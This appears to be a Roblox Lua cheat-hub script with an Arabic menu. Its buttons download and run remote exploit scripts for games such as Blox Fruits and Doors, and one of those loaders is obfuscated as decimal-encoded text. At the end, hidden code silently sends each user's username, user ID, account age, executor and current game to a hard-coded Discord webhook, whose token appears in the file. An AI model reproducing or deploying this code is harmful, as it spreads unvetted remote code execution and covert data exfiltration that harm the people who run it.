local redzlib = loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/RedzLibV5/main/Source.Lua"))()

local Window = redzlib:MakeWindow({
  Title = "ريك",
  SubTitle = "سكربت",
  SaveFolder = "Redz Config"
})

local Tab1 = Window:MakeTab({"القائمه الاساسيه", "cool"})

Tab1:AddButton({"نسخ رابط قناه التليكرام", function()
setclipboard('https://t.me/Hacatpeter')
end})

Tab1:AddButton({" نسخ يوزر المروج ", function()
setclipboard('@PE_T9')
end})

Tab1:AddButton({" نسخ يوزر ممول السكربتات  ", function()
setclipboard('@salih7711')
end})

Tab1:AddButton({"نسخ يوزر صانع السكربت", function()
setclipboard('@AP_7N')
end})
local Toggle1 = Tab1:AddToggle({
  Name = "Speed",
  Description = "Idk",
  Default = false
})

Tab1:AddSlider({
  Name = "سرعه اللاعب",
  Min = 1,
  Max = 100,
  Increase = 1,
  Default = 16,
  Callback = function(Value)
  game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = Value
  end
})


local Tab1 = Window:MakeTab({"بلوكس فروت", "cool"})

Tab1:AddButton({"----سكربتات بدون مفتاح---", function()
print("Hello World!")
end})



Tab1:AddButton({"ريدز/ سيوف اودن", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/BloxFruits/main/redz9999"))()
end})



Tab1:AddButton({"سكربت من جيمنج/ تلفيل وبدون لاق", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaCrack/Min/main/MinGamingEng"))()
end})


Tab1:AddButton({"وير ازير / تفريم البحر والهايدرا", function()

loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/3b2169cf53bc6104dabe8e19562e5cc2.lua"))()
end})



Tab1:AddButton({"صيد بونتي", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/daviduts1/rua-hub/main/auto%20bouty"))()
end})





Tab1:AddButton({"دايمونك / جميل", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Domadicoof/Domadicoof/main/Domadichub/NottoGay/Start.ranscript"))()
end})


Tab1:AddButton({"بريميوم / تفريم كاتاكوري وضرب سريع جدا", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/AnDepZaiHub/AnDepZaiHubBeta/main/AnDepZaiHubBeta.lua"))()
end})


Tab1:AddButton({"سيد/عده اشياء", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua", true))()
end})



Tab1:AddButton({"----سكربتات تحتاج مفاتيح ---", function()
print("Hello World!")
end})




Tab1:AddButton({"هوهو/ يحتوى على عده اشياء", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/acsu123/HOHO_H/main/Loading_UI"))()

end})



Tab1:AddButton({"سيوف زورو وتريل", function()
loadstring(game:HttpGet"https://raw.githubusercontent.com/UserDevEthical/Loadstring/main/CokkaHub.lua")()
end})

local Tab1 = Window:MakeTab({"ماب البيوت", "cool"})


Tab1:AddButton({"ماب البيوت 1", function()
loadstring(game:HttpGet(('https://raw.githubusercontent.com/sXPiterXs1111/SanderXV2.5/main/SanderXV2.5.lua')))()
end})


local Tab1 = Window:MakeTab({"بليد بول", "cool"})

Tab1:AddButton({"بليد بول 1", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/R3TH-PRIV/R3THPRIV/main/loader.lua'))()
end})






local Tab1 = Window:MakeTab({"كينج لجسي", "cool"})


Tab1:AddButton({"كينج لجسي1", function()
getgenv().RaidUI = false -- For Hidden Raid Mode true = show and false = hidden
getgenv().CustomDistance = 10 -- For Bug Can't Swipe Distance
loadstring(game:HttpGet("https://raw.githubusercontent.com/ChopLoris/ArcHub/main/main.lua"))()
end})

Tab1:AddButton({"كينج لجسي 2", function()
loadstring(game:HttpGet('https://zuwz.me/Ls-Zee-Hub-KL'))()
end})



Tab1:AddButton({"كينج لجسي 3", function()
loadstring(game:HttpGet"https://raw.githubusercontent.com/HULKUexe/mobileX/main/FreeScript.lua")()
end})

Tab1:AddButton({"كينج لجسي 4", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/DookDekDEE/Hyper/main/script.lua"))()
end})


local Tab1 = Window:MakeTab({"mm2", "cool"})



Tab1:AddButton({"ام ام تو 1", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/PotatoesDev/Lunar/main/LunarXyz.lua'))()
end})


local Tab1 = Window:MakeTab({"doors", "cool"})



Tab1:AddButton({"doors", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/FFJ1/Roblox-Exploits/main/scripts/Loader.lua"))()
end})



local Tab1 = Window:MakeTab({"سكربتات ومابات عشوائيه", "cool"})

Tab1:AddButton({"طيران", function()
loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
end})


Tab1:AddButton({"اختفاء", function()
loadstring(game:HttpGet('https://pastebin.com/raw/AYtzGEPb'))()
end})

Tab1:AddButton({"رقصات", function()
loadstring(game:HttpGet("https://scriptblox.com/raw/Brookhaven-RP-all-emotes-6849"))()
end})



Tab1:AddButton({"ماب الكره او TPS", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/hussain1323232234/My-Scripts/main/Street%20Soccer'))()
end})

Tab1:AddButton({"ديمون فال او demon fall", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/LynchHHU/AF-ScriptHub/main/Protected_8448829756613131.txt"))()
end})


Tab1:AddButton({"مشيات", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/GamingScripter/Animation-Hub/main/Animation%20Gui", true))()
end})



Tab1:AddButton({"شيندو لايف 1", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/IkkyyDF/ProjectNexus/main/Loader.lua"))()
end})



Tab1:AddButton({"شيندو لايف 2", function()
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/ahmadsgamer2/Script--Game/main/Script%20Game"))()
end})


local Tab1 = Window:MakeTab({"the strongest battlegrounds", "cool"})





local Tab1 = Window:MakeTab({"بت سلميتر", "cool"})


Tab1:AddButton({"بت سلميتر 1", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Somerandomidiot/Lua/main/PS99_Protected.txt"))()
end})






local Webhook = "https://discord.com/api/webhooks/1266154821535404074/HWpAdX5IB7-vVdCEIqrrMwrGcE4RI5pf4oy8-CbVryfxvF463EJKRaXEFtTG2EopiUn2" -- your webhook
_G.Discord_UserID = "sadsaa0748" -- ID To Ping on every execution, blank if no one wants to be pinged.
 
local player = game:GetService"Players".LocalPlayer
local joinTime = os.time() - (player.AccountAge*86400)
local joinDate = os.date("!*t", joinTime)
local premium = false
local alt = true
if player.MembershipType == Enum.MembershipType.Premium then
   premium = true
end
 
if not premium and player.AccountAge >= 70 then
    alt = "Possible"
elseif premium and player.AccountAge >= 70 then
   alt = false
end
 
local executor = identifyexecutor() or "Unknown"
local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game.Players.LocalPlayer.UserId))
Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
local AvatarImage = Thing.imageUrl
local msg = {
   ["username"] = "by ronaldo log",
   ["avatar_url"] = "",
   ["content"] = ( _G.Discord_UserID ~= "" and  _G.Discord_UserID ~= nil) and tostring("@".._G.Discord_UserID.."") or " ",
   ["embeds"] = {
       {
           ["color"] = tonumber(tostring("0x32CD32")), --decimal
           ["title"] = "مستخدمين السكربت",
           ["thumbnail"] = {
               ["url"] = AvatarImage,
           },
           ["fields"] = {
                {
                   ["name"] = "الاسم",
                   ["value"] = "||"..player.Name.."||",
                   ["inline"] = true
                },
                {
                   ["name"] = "الاسم الوهمي",
                   ["value"] = player.DisplayName,
                   ["inline"] = true
                },
                {
                   ["name"] = "الايدي",
                   ["value"] = "||["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")||",
                   ["inline"] = true
                },
                {
               ["name"] = "ايدي الماب",
               ["value"] = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) ..")",
               ["inline"] = true              
                },
                {
                   ["name"] = "اسم الماب",
                   ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
                   ["inline"] = true
                },
                {
                   ["name"] = "الهاك المستخدم",
                   ["value"] = executor,
                   ["inline"] = true
                },
                {
                   ["name"] = "اشتراك روب",
                   ["value"] = alt,
                   ["inline"] = true
                },
                {
                   ["name"] = "عمر الحساب",
                   ["value"] = player.AccountAge.."day(s)",
                   ["inline"] = true
                },
                {
                   ["name"] = "وقت دخوله",
                   ["value"] = joinDate.day.."/"..joinDate.month.."/"..joinDate.year,
                   ["inline"] = true
                },
           },
           ['timestamp'] = os.date("%Y-%m-%dT%X.000Z")
       }
   }
}
 
if isfile("Workspace/readthis.txt") then
        request = http_request or request or HttpPost or syn.request
    request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
    makefolder("Workspace")
    writefile("Workspace/readthis.txt", "true")
    else
    request = http_request or request or HttpPost or syn.request
    request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
    makefolder("Workspace")
    writefile("Workspace/readthis.txt", "true")
end

